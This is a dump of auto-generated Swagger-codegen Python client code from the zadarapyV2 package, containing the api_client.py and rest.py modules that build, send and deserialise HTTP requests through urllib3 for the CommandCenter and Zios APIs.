:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/CommandCenter/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/CommandCenter/rest.py | rest.py |
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from Zios.configuration import Configuration
import Zios.models
from Zios import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
self.client_side_validation = configuration.client_side_validation
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(Zios.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Zios/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
